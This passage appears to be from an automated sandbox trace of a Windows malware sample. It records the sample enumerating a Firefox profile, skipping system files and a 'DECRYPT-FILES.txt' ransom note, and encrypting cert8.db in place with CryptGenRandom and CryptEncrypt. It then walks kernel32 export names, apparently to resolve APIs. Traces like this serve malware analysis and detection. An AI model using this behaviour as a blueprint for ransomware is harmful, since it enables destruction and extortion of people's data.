ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac454f20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0080.765] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0080.765] CloseHandle (hObject=0x460) returned 1 [0080.766] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb47c9bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb47c9bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="DECRYPT-FILES.txt") returned -1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="autorun.inf") returned 1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="boot.ini") returned 1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="desktop.ini") returned -1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="ntuser.dat") returned -1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="iconcache.db") returned -1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="bootsect.bak") returned 1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="ntuser.dat.log") returned -1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="thumbs.db") returned -1 [0080.766] lstrcmpiW (lpString1="cert8.db", lpString2="Bootfont.bin") returned 1 [0080.766] lstrlenW (lpString="cert8.db") returned 8 [0080.766] lstrcmpiW (lpString1="db", lpString2="lnk") returned -1 [0080.766] lstrcmpiW (lpString1="db", lpString2="exe") returned -1 [0080.766] lstrcmpiW (lpString1="db", lpString2="sys") returned -1 [0080.766] lstrcmpiW (lpString1="db", lpString2="dll") returned -1 [0080.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.766] lstrlenW (lpString="cert8.db") returned 8 [0080.766] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.766] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" [0080.766] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.767] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=65536) returned 1 [0080.767] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.767] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.768] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.768] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.768] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.770] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.770] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.771] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.772] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.773] CloseHandle (hObject=0x464) returned 1 [0080.773] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.773] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.774] CloseHandle (hObject=0x0) returned 0 [0080.774] CloseHandle (hObject=0x460) returned 1 [0080.774] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.775] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.775] GetTickCount () returned 0x114cade [0080.775] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.775] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.775] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.775] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.776] lstrlenA (lpString="kernel32.dll") returned 12 [0080.776] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.776] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.776] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.776] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.776] lstrlenA (lpString="ADDATOMA") returned 8 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.776] lstrlenA (lpString="ADDATOMW") returned 8 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.776] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.776] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.776] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.776] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.776] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.777] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.777] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.777] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.777] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.777] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.777] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.777] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.777] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.777] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.777] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.777] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.777] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.777] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.777] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.777] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.777] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.777] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.778] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.778] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.778] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.778] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.778] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.778] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.778] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.778] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.778] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.778] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.778] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.778] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.778] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.778] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.778] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.778] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.778] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.778] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.778] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.779] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.779] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.779] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.779] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.779] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.779] lstrlenA (lpString="BEEP") returned 4 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.779] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.779] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.779] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.779] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.779] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.779] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.779] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.779] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.779] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.779] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.779] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.779] lstrlenA (lpString="CANCELIO") returned 8 [0080.779] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.780] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.780] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.780] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.780] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.780] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.780] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.780] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.780] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.780] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.780] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.780] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.780] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.780] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.780] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.780] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.780] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.780] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.780] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.780] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.780] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.781] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.781] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.781] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.781] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.781] lstrcpyA (in: lpString1=0x3f2c7fc, 